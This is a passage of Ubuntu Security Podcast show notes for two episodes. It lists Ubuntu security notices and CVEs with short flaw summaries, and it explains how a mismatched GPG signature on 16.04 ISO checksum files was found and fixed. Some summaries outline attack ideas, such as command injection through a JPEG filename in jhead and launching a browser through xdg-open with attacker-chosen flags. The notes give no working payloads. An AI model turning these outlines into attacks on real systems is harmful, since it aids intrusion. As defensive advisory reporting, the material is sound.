<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2612">CVE-2023-2612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1078">CVE-2023-1078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1075">CVE-2023-1075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3707">CVE-2022-3707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1380">CVE-2023-1380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30456">CVE-2023-30456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32233">CVE-2023-32233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 (20.04 bluefield, 18.04 AWS)</li>
</ul>
<h3 id="usn-6133-1-linux-kernel--intel-iotg--vulnerabilities--05-42">[<a href="https://ubuntu.com/security/notices/USN-6133-1">USN-6133-1</a>] Linux kernel (Intel IoTG) vulnerabilities (05:42)</h3>
<ul>
<li>12 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20938">CVE-2023-20938</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1872">CVE-2023-1872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1078">CVE-2023-1078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1075">CVE-2023-1075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3707">CVE-2022-3707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1829">CVE-2023-1829</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 Intel IoTG</li>
</ul>
<h3 id="usn-6134-1-linux-kernel--intel-iotg--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6134-1">USN-6134-1</a>] Linux kernel (Intel IoTG) vulnerabilities</h3>
<ul>
<li>24 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26545">CVE-2023-26545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21102">CVE-2023-21102</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20938">CVE-2023-20938</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1872">CVE-2023-1872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1652">CVE-2023-1652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1078">CVE-2023-1078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1075">CVE-2023-1075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1074">CVE-2023-1074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1073">CVE-2023-1073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0458">CVE-2023-0458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0394">CVE-2023-0394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4842">CVE-2022-4842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47929">CVE-2022-47929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4129">CVE-2022-4129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3707">CVE-2022-3707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0386">CVE-2023-0386</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1281">CVE-2023-1281</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1829">CVE-2023-1829</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 Intel IoTG as well</li>
</ul>
<h3 id="usn-6112-2-perl-vulnerability--05-54">[<a href="https://ubuntu.com/security/notices/USN-6112-2">USN-6112-2</a>] Perl vulnerability (05:54)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-31484">CVE-2023-31484</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-197/#usn-6112-1-perl-vulnerability--09-35">[USN-6112-1] Perl vulnerability from Episode 197</a></li>
<li>failed to properly validate TLS certs when using <code>CPAN</code> and <code>HTTP::Tiny</code></li>
</ul>
<h3 id="usn-6136-1-frr-vulnerabilities--06-19">[<a href="https://ubuntu.com/security/notices/USN-6136-1">USN-6136-1</a>] FRR vulnerabilities (06:19)</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-31490">CVE-2023-31490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31489">CVE-2023-31489</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Implements BGP, OSPF, RIP, IS-IS, PIM and more - successor to Quagga</li>
<li>Two issues in BGP handling - both OOB reads due to failing to use the right
lengths when reading packet structures, implemented in C</li>
</ul>
<h3 id="usn-6137-1-libraw-vulnerabilities--06-43">[<a href="https://ubuntu.com/security/notices/USN-6137-1">USN-6137-1</a>] LibRaw vulnerabilities (06:43)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1729">CVE-2023-1729</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32142">CVE-2021-32142</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow and stack buffer overflow (mitigated by stack protector
etc)</li>
</ul>
<h3 id="usn-6138-1-libssh-vulnerabilities--07-01">[<a href="https://ubuntu.com/security/notices/USN-6138-1">USN-6138-1</a>] libssh vulnerabilities (07:01)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2283">CVE-2023-2283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1667">CVE-2023-1667</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL ptr deref during re-keying - already authenticated user could trigger a DoS</li>
<li>Possible for a client to avoid having its signature fully verified IF during
the verification process there is insufficient memory - fails, leaves in error
state that then falls though to an OK state</li>
</ul>
<h3 id="usn-6139-1-python-vulnerability--07-37">[<a href="https://ubuntu.com/security/notices/USN-6139-1">USN-6139-1</a>] Python vulnerability (07:37)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-24329">CVE-2023-24329</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-191/#usn-5960-1-python-vulnerability-05-51">[USN-5960-1] Python vulnerability from Episode 191</a> - original upstream fix was
incomplete</li>
</ul>
<h3 id="usn-6140-1-go-vulnerabilities--07-57">[<a href="https://ubuntu.com/security/notices/USN-6140-1">USN-6140-1</a>] Go vulnerabilities (07:57)</h3>
<ul>
<li>8 CVEs addressed in Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-29400">CVE-2023-29400</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-24540">CVE-2023-24540</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-24539">CVE-2023-24539</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-24538">CVE-2023-24538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41725">CVE-2022-41725</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-24537">CVE-2023-24537</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-24534">CVE-2023-24534</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41724">CVE-2022-41724</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various content injection issues in JS, CSS and HTML template handling due to
failing to properly parse various delimiting elements (like backtick <code>`</code> for JS
etc)</li>
<li>Also two DoS since could trigger a panic due to mishandling of memory</li>
</ul>
<h3 id="usn-6141-1-xfce4-settings-vulnerability--08-31">[<a href="https://ubuntu.com/security/notices/USN-6141-1">USN-6141-1</a>] xfce4-settings vulnerability (08:31)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45062">CVE-2022-45062</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>MIME helper failed to properly parse input - is called via <code>xdg-open</code> - so could
call <code>xdg-open</code> with crafted input that would then get passed through to
whatever application (like say the browser / file manager etc) and hence could
run these other applications with arbitrary arguments - e.g. could embed a
link in a PDF and when the user clicks this can then get say the browser to be
launched with arbitrary arguments</li>
<li>e.g. could set the <code>--remote-allow-origins</code> flag to specify an attacker
controlled domain which is then allowed to connect to the local debugging port
and hence execute arbitrary JS on any other domain - steal creds etc</li>
</ul>
<h3 id="usn-6142-1-nghttp2-vulnerability--10-16">[<a href="https://ubuntu.com/security/notices/USN-6142-1">USN-6142-1</a>] nghttp2 vulnerability (10:16)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11080">CVE-2020-11080</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>C library for HTTP/2</li>
<li>Overly large <code>SETTINGS</code> frames would cause a CPU-based DoS - mitigated by
setting a max limit for these frame types and rejecting if too large</li>
</ul>
<h3 id="usn-6143-1-firefox-vulnerabilities--10-50">[<a href="https://ubuntu.com/security/notices/USN-6143-1">USN-6143-1</a>] Firefox vulnerabilities (10:50)</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-34415">CVE-2023-34415</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34417">CVE-2023-34417</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34416">CVE-2023-34416</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34414">CVE-2023-34414</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>114.0 release</li>
</ul>
<h3 id="usn-6144-1-libreoffice-vulnerabilities--10-59">[<a href="https://ubuntu.com/security/notices/USN-6144-1">USN-6144-1</a>] LibreOffice vulnerabilities (10:59)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2255">CVE-2023-2255</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0950">CVE-2023-0950</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Array index underflow in handling of crafted formulas in Calc - memory corruption -&gt; RCE</li>
<li>Failed to prompt user before loading a document into an IFrame - document can then contain other elements like JS etc that get executed</li>
</ul>
<h3 id="usn-6028-2-libxml2-vulnerabilities--11-35">[<a href="https://ubuntu.com/security/notices/USN-6028-2">USN-6028-2</a>] libxml2 vulnerabilities (11:35)</h3>
<ul>
<li>3 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-29469">CVE-2023-29469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28484">CVE-2023-28484</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2309">CVE-2022-2309</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different NULL ptr deref, possible double free
<ul>
<li>DoS / RCE via crafted XML documents</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="recent-report-of-invalid-gpg-signatures-on-16-dot-04-isos--12-04">Recent report of invalid GPG signatures on 16.04 ISOs (12:04)</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/t/is-ubuntu-vulnerable-to-fake-keys/21997/4">https://discourse.ubuntu.com/t/is-ubuntu-vulnerable-to-fake-keys/21997/4</a></li>
<li>User reported that the SHA256SUMS file for 16.04 ISOs on
old-releases.ubuntu.com failed to validate</li>
<li>Sounds scary - has the server been hacked and the ISOs (and hence SHA256SUMS
file) been tampered with?</li>
<li>We don&rsquo;t sign the ISOs directly - instead (like <code>apt</code>) we take a hash of the ISO
file and then sign the file containing that list of hashes - for performance</li>
<li>So in this case, it would appear that the <code>SHA256SUMS</code> file has been modified
and so does not validate properly</li>
<li>One other thing to note, this report was made in a follow-up comment to an
older thread where someone mentioned that they are able to upload arbitrary
keys to the ubuntu keyserver that mimic the archive / CD image signing keys
etc - this is the nature of key servers - anyone can upload any key with any
arbitrary identifiers - but since keys are generated from randomness, it is
theoretically impossible to generate a key with the same underlying
cryptographic fingerprint (even if it has the same name / email address
associated with it)</li>
<li>Always important to make sure you use the right keys - as identified by their
fingerprint - these are listed on the wiki
<a href="https://wiki.ubuntu.com/SecurityTeam/FAQ#GPG_Keys_used_by_Ubuntu">https://wiki.ubuntu.com/SecurityTeam/FAQ#GPG_Keys_used_by_Ubuntu</a></li>
<li>These keys are also contained on all Ubuntu installs within the
<code>/usr/share/keyrings/ubuntu-archive-keyring.gpg</code> file from the <code>ubuntu-keyring</code>
package</li>
<li>Able to easily verify this behaviour locally:</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>wget -q https://old-releases.ubuntu.com/releases/xenial/SHA256SUMS<span style="color:#f92672">{</span>,.gpg<span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>gpg --verify --no-default-keyring --keyring<span style="color:#f92672">=</span>/usr/share/keyrings/ubuntu-archive-keyring.gpg --verbose SHA256SUMS.gpg SHA256SUMS
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>gpg: Signature made Fri 01 Mar 2019 02:56:07 ACDT
</span></span><span style="display:flex;"><span>gpg:                using DSA key 46181433FBB75451
</span></span><span style="display:flex;"><span>gpg: Can&#39;t check signature: No public key
</span></span><span style="display:flex;"><span>gpg: Signature made Fri 01 Mar 2019 02:56:07 ACDT
</span></span><span style="display:flex;"><span>gpg:                using RSA key D94AA3F0EFE21092
</span></span><span style="display:flex;"><span>gpg: using pgp trust model
</span></span><span style="display:flex;"><span>gpg: BAD signature from &#34;Ubuntu CD Image Automatic Signing Key (2012) &lt;cdimage@ubuntu.com&gt;&#34; [unknown]
</span></span><span style="display:flex;"><span>gpg: binary signature, digest algorithm SHA512, key algorithm rsa4096
</span></span></code></pre></div><ul>
<li>So far so scary - it really does look like the <code>SHA256SUMS</code> file was modified</li>
<li>But if we look closer, we can see GPG says the signature was made on 28th
February 2019 - this corresponds with the 16.04.6 point release - yet the most
recent point release was 16.04.7 from <a href="https://lists.ubuntu.com/archives/ubuntu-announce/2020-August/000261.html">13th August 2020</a> for BootHole (<a href="/episode-84/#alex-and-joe-take-an-in-depth-and-behind-the-scenes-look-at-boothole-grub-2-08-14">Alex and
Joe take an in-depth and behind-the-scenes look at BootHole / GRUB from
Episode 84</a>) - so it appears that perhaps the various signature files were
not regenerated when the 16.04.7 point release was made (yet the various SUMS
files were)</li>
<li>Marc went asking around, <code>vorlon</code> from Foundations confirmed this was the case</li>
<li>Simply had to run the script to resign this and push it to the server - now
all is good as can be seen below</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>gpg: Signature made Fri 09 Jun 2023 00:38:30 ACST
</span></span><span style="display:flex;"><span>gpg:                using RSA key 843938DF228D22F7B3742BC0D94AA3F0EFE21092
</span></span><span style="display:flex;"><span>gpg: using pgp trust model
</span></span><span style="display:flex;"><span>gpg: Good signature from &#34;Ubuntu CD Image Automatic Signing Key (2012) &lt;cdimage@ubuntu.com&gt;&#34; [unknown]
</span></span><span style="display:flex;"><span>gpg: WARNING: This key is not certified with a trusted signature!
</span></span><span style="display:flex;"><span>gpg:          There is no indication that the signature belongs to the owner.
</span></span><span style="display:flex;"><span>Primary key fingerprint: 8439 38DF 228D 22F7 B374  2BC0 D94A A3F0 EFE2 1092
</span></span><span style="display:flex;"><span>gpg: binary signature, digest algorithm SHA512, key algorithm rsa4096
</span></span></code></pre></div><ul>
<li>Thanks to the anonymous user in the Ubuntu Discourse for bringing this to our
attention</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E198.mp3" length="17666940" type="audio/mpeg" /><itunes:duration>1054</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 197
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-197/</link>
          <pubDate>Fri, 02 Jun 2023 21:20:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>2e801e9856dac1f0bf4ef447c8f36e25710152e6c2ab63821012a5c434eedc53bb15f0be640f34296589b2a28aad51b5cdeb23083ae278c31a45096d73bfc2b1</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 197</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          The venerable Ubuntu 18.04 LTS release has transitioned into ESM, plus we look
  at Till Kamppeter's excellent guide on how to set up your GitHub projects to
  receive private vulnerability reports, and we cover the week in security updates...
        
        ]]></itunes:subtitle>
        <itunes:summary>  The venerable Ubuntu 18.04 LTS release has transitioned into ESM, plus we look
  at Till Kamppeter's excellent guide on how to set up your GitHub projects to
  receive private vulnerability reports, and we cover the week in security updates
  including PostgreSQL, Jhead, the Linux kernel, Linux PTP, snapd and a whole lot
  more.
  </itunes:summary>
        <description>  The venerable Ubuntu 18.04 LTS release has transitioned into ESM, plus we look
  at Till Kamppeter's excellent guide on how to set up your GitHub projects to
  receive private vulnerability reports, and we cover the week in security updates
  including PostgreSQL, Jhead, the Linux kernel, Linux PTP, snapd and a whole lot
  more.
  </description>
        <googleplay:description>  The venerable Ubuntu 18.04 LTS release has transitioned into ESM, plus we look
  at Till Kamppeter's excellent guide on how to set up your GitHub projects to
  receive private vulnerability reports, and we cover the week in security updates
  including PostgreSQL, Jhead, the Linux kernel, Linux PTP, snapd and a whole lot
  more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>The venerable Ubuntu 18.04 LTS release has transitioned into ESM, plus we look
at Till Kamppeter&rsquo;s excellent guide on how to set up your GitHub projects to
receive private vulnerability reports, and we cover the week in security updates
including PostgreSQL, Jhead, the Linux kernel, Linux PTP, snapd and a whole lot
more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>56 unique CVEs addressed</p>
<h3 id="usn-6104-1-postgresql-vulnerabilities--00-55">[<a href="https://ubuntu.com/security/notices/USN-6104-1">USN-6104-1</a>] PostgreSQL vulnerabilities (00:55)</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2455">CVE-2023-2455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2454">CVE-2023-2454</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Two issues, both requiring to be an authenticated user. One in mishandling of
<code>CREATE</code> privileges - could then allow an auth user to execute arbitrary code as
a the bootstrap supervisor - the other in row security properties which could
allow to bypass policies and get read/write contrary to security policy.</li>
</ul>
<h3 id="usn-6105-1-ca-certificates-update--01-32">[<a href="https://ubuntu.com/security/notices/USN-6105-1">USN-6105-1</a>] ca-certificates update (01:32)</h3>
<ul>
<li>Affecting Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)</li>
<li>Updates to the latest upstream 2.60 release from Mozilla, adds a bunch of new
CAs plus removes some that had either expired or that were now not used
anymore</li>
</ul>
<h3 id="usn-6106-1-calamares-settings-ubuntu-vulnerability--02-08">[<a href="https://ubuntu.com/security/notices/USN-6106-1">USN-6106-1</a>] calamares-settings-ubuntu vulnerability (02:08)</h3>
<ul>
<li>Affecting Jammy (22.04 LTS)</li>
<li>When installing Lubuntu, it would allow to create the first user with an empty
password. Lubuntu uses it&rsquo;s own installer called <a href="https://calamares.io/">Calamares</a> - so this issue
only affects Lubuntu, not regular Ubuntu or other Ubuntu flavors.</li>
</ul>
<h3 id="usn-6100-1-html-stripscripts-vulnerability--02-58">[<a href="https://ubuntu.com/security/notices/USN-6100-1">USN-6100-1</a>] HTML::StripScripts vulnerability (02:58)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-24038">CVE-2023-24038</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>REDoS when parsing HTML with &ldquo;certain style attributes&rdquo;</li>
</ul>
<h3 id="usn-6108-1-jhead-vulnerabilities--03-18">[<a href="https://ubuntu.com/security/notices/USN-6108-1">USN-6108-1</a>] Jhead vulnerabilities (03:18)</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-41751">CVE-2022-41751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34055">CVE-2021-34055</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-196/#usn-6098-1-jhead-vulnerabilities--09-48">[USN-6098-1] Jhead vulnerabilities in last week&rsquo;s episode</a></li>
<li>Code-exec - place OS commands into a JPEG filename and then using
jhead to rotate the file</li>
<li>Buffer overflow when writing Exif data</li>
</ul>
<h3 id="usn-6110-1-jhead-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6110-1">USN-6110-1</a>] Jhead vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28277">CVE-2021-28277</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28275">CVE-2021-28275</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3496">CVE-2021-3496</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Stack buffer overflow, heap buffer overflow and OOB read - DoS / code exec</li>
</ul>
<h3 id="usn-6113-1-jhead-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6113-1">USN-6113-1</a>] Jhead vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-6612">CVE-2018-6612</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer OOB read -&gt; DoS</li>
</ul>
<h3 id="usn-6054-2-django-vulnerability--04-17">[<a href="https://ubuntu.com/security/notices/USN-6054-2">USN-6054-2</a>] Django vulnerability (04:17)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-31047">CVE-2023-31047</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-194/#usn-6054-1-django-vulnerability--00-55">[USN-6054-1] Django vulnerability in Episode 194</a></li>
</ul>
<h3 id="usn-6109-1-usn-6118-1-linux-kernel--raspberry-pi-plus-oracle--vulnerabilities--04-29">[<a href="https://ubuntu.com/security/notices/USN-6109-1">USN-6109-1</a>, <a href="https://ubuntu.com/security/notices/USN-6118-1">USN-6118-1</a>] Linux kernel (Raspberry Pi + Oracle) vulnerabilities (04:29)</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1078">CVE-2023-1078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1075">CVE-2023-1075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3707">CVE-2022-3707</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 raspi + oracle on both 20.04 + 18.04</li>
<li>Most issues covered on previous episodes</li>
</ul>
